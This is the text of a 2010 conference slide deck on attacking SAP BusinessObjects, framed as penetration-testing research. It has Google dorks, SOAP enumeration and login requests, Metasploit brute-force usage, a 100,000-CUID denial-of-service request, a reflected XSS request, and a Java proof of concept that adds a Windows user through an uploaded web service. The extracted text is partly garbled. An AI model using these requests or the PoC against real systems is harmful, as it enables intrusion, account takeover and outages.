WIXLIB

Hacking SAP BusinessObjectsJoshua ‘Jabra’ Abraham - jabra@rapid7.comWillis Vandevanter – will@rapid7.com09/22/10

OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary

Standard DisclaimerDo not do anythingcontainedwithin thispresentationunless you havewrittenpermission!!

Who are We?Joshua “Jabra” Abraham – Security Consultant/ResearcherPenetration Testing , Web Application Audits and Security ResearcherBachelor of Science in Computer ScienceContributes to the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJSpeaker/Trainer at BlackHat, DefCon, ShmooCon, SANS Pentest Summit ,OWASPConferences, LinuxWorld, Infosec World, CSI and ComdexTwitter: http://twitter.com/jabra Blog: http://spl0it.wordpress.comWillis Vandevanter – Security Consultant/ResearcherPenetration Tester and Security ResearcherBSc in CS, Masters of CS in Secure Software EngineeringTwitter: http://twitter.com/willis (two underscores!!)

Rapid7 OverviewVulnerability ManagementOpen source projectsProfessional ServicesNetwork PentestingWeb Application AuditsTrainingDeployment

OverviewWhat we will discussWhat we will notdiscussThings to keep in mindBreaking stuff is coolDisclaimer

SAP Product SuiteEnterprise ResourcePlanningBusiness Intelligence (BI)Business SuiteCustomer RelationshipPlanningEnterprise Resource PlanningProduct LifecycleManagementSupply Chain ManagementSupplier RelationshipManagementR/3BusinessObjectsNetweaver

Focus of this talkSAP BusinessObjectsEnterprise XI (XI 3.2 isthe latest version)20,000 ft viewAggregating andanalyzing vast amounts ofdata along withpresentation of/providingaccess via manyinterfacesFlexible, Scalable, andAccessible

BO BI Architecture Overview

Interfaces we focused on

Central Management ConsoleAdministrative Interface toBOAccess is provided via thewebserver(http://ip:6405/CmcApp)authenticates against theCentral Management ServerProvidesUser and group creation andmanagementServer/ServicesConfigurationObject Rights, scheduling,security settings

Web ServicesProvides:Session HandlingAuth, User privilegemanagementBusiness IntelligencePlatformServer administration,scheduling, etc.Report EngineAccess reports (CrystalReports, WebIntelligence, etc.)QueryBuild ad hoc queries

Service Oriented Architecture 101Think Object Orientedover XMLAdd this on top of HTTPThat’s SOA!Connect LegacysystemsStep 2) Web ServiceRequestStep 1) User RequestStep 4) Web Server ResponseStep 3) Web ServiceResponseUser

SOAP 101Web ServicesAPI in XML over HTTPOSI Layer 8,9 and 10 Layer 8 – XMLLayer 9 – Security (WS-*)Layer 10 – SOAP“Wiz Dullz” (WSDLs)Data definitionsUDDIsPointers

Threat ModelWeb Services in TransitWeb Services EngineWeb Services DeploymentWeb Services User CodeReference: Hacking Web Services

SSL vs Message SecurityPoint-to-Point OR chained workflowSSL (All or nothing)No fine grained control of portions of the applicationsNo audit trailNode 2Node 3Ton of work!Add amounts of securityAudit trailNode 5Verify messages have not changed!Encrypt message body (admin attack)Node 4MessageNode 1

Tools of the TradeSOAP QA Testing toolsSOAPUIFavorite Programming LanguageCustom toolsProxiesOur favorite ethods-ofquick-exploitation-of-blind 25.html

Custom Web Services Client#!/usr/bin/ruby –wrequire 'soap/wsdlDriver'require 'pp‘wsdl �driver SOAP::WSDLDriverFactory.new(wsdl).create rpc driver# Log SOAP request and responsedriver.wiredump file base "soap-log.txt"# Use Burp proxy for all requestsdriver.httproxy 'http://localhost:8080'# Log SOAP request and responseresponse driver.GetQuote(:symbol 'MSFT')pp response

SOAPUI

BurpSuiteUsage with IntruderVerify the PRNG –SequencerEtc., etc.

X’s and O’s and Icebergs

X’s and O’s and Icebergs

X’s and O’s and Icebergs

OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary

Real-World PentestingEvil Attackers - BlackhatsFinancially MotivatedNot limited by amount of time and/or resourcesPen testers – WhitehatsContext / Goal Focused (experience, 6th sense, etc)Demonstrate real world risks, but limited by the time ofthe engagementA snapshot of the network/application at a point in time

Goal Oriented PentestingEmulate Blackhat, by using Goals as motivationDoesn’t replace experience / 6th sense elementsPentesting teams focus efforts on critical weaknessesNon-technical methodology in which process is centralfocusProvides best (ROI) for organizations when they conductpenetration assessments

Threat ModelLot of Entry points, weexamined a coupleDifferent Goals forDifferent FolksUnauthorized Access toInformationRemote Exploitation of BOServer and Internal PivotInformational Only (VersionFingerprinting, etc.)

OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary

Web Application Overview/CmcAppAdministrator interface/dswsbobjeWeb Services for BusinessObjectsNot installed by defaultRequires deployment of a war/InfoViewAppQuerying interface/AnalyticalReportingReporting interface

ReconnaissanceExternal and InternalEnumerationGoogle dorks foridentifying externallyaccessible instancesPort and applicationbased enumerationVersion FingerprintingBrowser basedWeb services based

Google DorksBusinessObjects –InfoViewApp interfaceinurl:infoviewappCrystal Reports filetype:cwrfiletype:cwr inurl:apstokenfiletype:cwr inurl:viewrptinurl:apspasswordfiletype:cwr inurl:initinurl:opendoc inurl:sType

Um, anyone wanta port scaninternally ?Google: filetype:cwr inurl:apstokenInternal port scanning (port 80)http://hostname/CrystalReports/viewrpt.cwr?id ID&wid WID&apstoken internal:80@ TOKENPort Closed Response :Server HOSTNAME:80 not found or server may be down (FWM 01003)internal port scanning (port 445)http://hostname/CrystalReports/viewrpt.cwr?id ID&wid WID&apstoken internal:445@ TOKENPort Open Response:# Unable to open a socket to talk to CMS HOSTNAME:445 (FWM 01005)

Unique ng8080/tcp/dswsbobje

Version Detection – Web /AnalyticalReporting merge web.xmlResponse: snip web-app context-param param-name applet.version /param-name param-value 12.1.0.828 /param-value /context-param /web-app

Version Detection – Web ServiceRequest:POST p. soapenv:Envelope xmlns:soapenv s 1" soapenv:Header/ soapenv:Body ns:getVersion/ /soapenv:Body /soapenv:Envelope Response: soapenv:Envelope xmlns:soapenv "http://schemas.xmlsoap.org/soap/envelope/" soapenv:Body getVersionResponse xmlns 1" Version 12.1.0 /Version /getVersionResponse /soapenv:Body /soapenv:Envelope

MSFv3 Version Detection Modulemsf use scanner/http/sap businessobjects version enumsap businessobjects version enum set RHOSTS 192.168.1.0/24sap businessobjects version enum runBased on using Dswsbobje (8080/tcp)Web Service Version request - Unauthenticated

Username EnumerationResponse tells you if the username is validValid Username/Invalid password/SOAP method only

Username EnumerationPOST /dswsbobje/services/session HTTP/1.1Content-Type: text/xml; charset UTF-8SOAPAction: 1/login"User-Agent: Axis2Host: x.x.x.x:8080Content-Length: 631 ?xml version '1.0' encoding 'UTF-8'? soapenv:Envelope xmlns:soapenv "http://schemas.xmlsoap.org/soap/envelope/" soapenv:Body login xmlns 1" credential xmlns 1"xmlns:ns 1"xmlns:xsi "http://www.w3.org/2001/XMLSchema-instance" Login "administrator"Password "PASSWORD1" xsi:type "ns:EnterpriseCredential" / version xmlns 1" BOE XI 3.0 /version /login /soapenv:Body /soapenv:Envelope

MSFv3 User Enumeration Modulesmsf use scanner/http/sap businessobjects user enumsap businessobjects user enum set RHOSTS 192.168.1.0/24sap businessobjects user enum set USERNAME administratorsap businessobjects version enum runBased on using Dswsbobje (8080/tcp)Web Service Login request

OverviewMethodology / Threat ModelReconnaissance / DiscoveryAttacking!Summary

Unique Identifier (CUID)CUIDs – used similar to session ids for tasks thatare performed.Ability to request a specific number of CUIDs

Denial of Service AttackI’d like 100,000 CUIDs please!POST /dswsbobje/services/biplatform HTTP/1.1Content-Type: text/xml; charset ects.com/2007/06/01/GenerateCuids

DoS ?xml version '1.0' encoding 'UTF-8'? soapenv:Envelope xmlns:soapenv "http://schemas.xmlsoap.org/soap/envelope/" soapenv:Body GenerateCuids xmlns 6/01" SessionID xmlns 6/01" itdirs8l4vkou4%3A6400 %40it-dirs8l4vkou4%3A6400 hkJg2K28oTJ1Nq osca%3Aiiop%3A%2F%2Fitdirs8l4vkou4%3A6400%3BSI SESSIONID%3D2148JfhkJg2K28oTJ1Nq en US America/LosAngeles” /SessionID numCuids xmlns 6/01" 100000 /numCuids /GenerateCuids /soapenv:Body /soapenv:Envelope

Oracle SQL Injection Error CodesCatch interesting errorsORA-00921: unexpected end of SQL commandORA-00936: missing expressionORA-00933: SQL command not properly endedORA-00970, ORA-00907, ORA-01756, ORA-00923,ORA-00900, PLS-00103, LPX-00601, ORA-00604Crashes – for C codeORA-03113 – might also be an instance crashORA-03114, ORA-01012ORA-00600 – Internal /2008/12/UKOUG122008-slavik.pdf

MSFv3 User Bruteforce Modulemsf use scanner/http/sap businessobjects user brutesap businessobjects user brute set RHOSTS 192.168.1.0/24sap businessobjects user brute set USERNAME administratorsap businessobjects user brute set PASSWORD passwordsap businessobjects version brute runBased on using Dswsbobje (8080/tcp)Web Service Login request

MSFv3 User Bruteforce Module(Web)msf use scanner/http/sap businessobjects user websap businessobjects user web set RHOSTS 192.168.1.0/24sap businessobjects user web set USERNAME administratorsap businessobjects user web set PASSWORD passwordsap businessobjects version web runBased on using CmcApp (6405/tcp)Web Application Login request

Reflective Cross-Site ScriptingRequest:GET /dswsbobje/axis2admin/engagingglobally?modules "%3e%20%3cXSS%3e&submit Engage HTTP/1.1Host: x.x.x.x:8080.snip Response:.snip. p font color "blue" The system is attempting to engage a module that isnot available: " XSS /font /p !-.snip.

Persistent Cross Site Scripting

Persistent Cross Site Scripting

Remote Code ExecutionCross-Site Scripting isGreat, but we want ashell!!CmcAppServices for Upload andExec:InputFileRespositoryProgramJobServer not enabled by defaultTo execute an Exe,administrator credentialsrequired

CmcApp RCEYou can set program object specific logon details byediting the "Program Logon" property of an object.These authentication details are not required if thecredentials have been globally set(Applications CMC Program Object Rights "Schedule with the following Operating SystemCredentials").Reference: CMC Help Index program objects Java programs Authentication and programobjects

CmcApp Steps for RCE1. Log on to the server computer.2. Go to Control Panel Administrative Tools Local Security Policy.3. Under Security settings click Local Policies and then click User RightsAssignment.4. Add the domain user account to the following policy:a. Replace Process Level Token Policy.b. Log on as a batch job.c. Adjust memory quotas for a process.d. Access this computer from the network. (usually everyone by default)5. Go to the CCM and stop the Program Job Server.6. Right-click Program Job Server and then click Properties.7. Type the domain user account and password into the Log On As textbox.8. Now you can schedule a metric refresh.

DswsbobjeProvides Web Services for BusinessObjectsNot installed by defaultRequires:Deployment of warRequires Tomcat interfaceRemember the Tomcat Manager Vulnerability(tomcat/tomcat) Remote Code ExecutionOpens up a new n/login

Dswsbobje (think: dsw-s-bobje)Ability to administer web servicesModify web servicesDelete web services (already deployed)Add web services ( hmm that sounds handy! )Guess what . it is!

Remote Code Execution PoCpackage org.apache.axis2.axis2userguide;import java.io.IOException;public class AddUser {public AddUser() {}public void main() {Process process;try {process Runtime.getRuntime().exec("net user foo bar /add");}catch(IOException ioexception) {ioexception.printStackTrace();}return;}}

DEMO!http://spl0it.org/files/talks/source barcelona10/demo/RCE SAP BusinessObjects Dswsbobje.html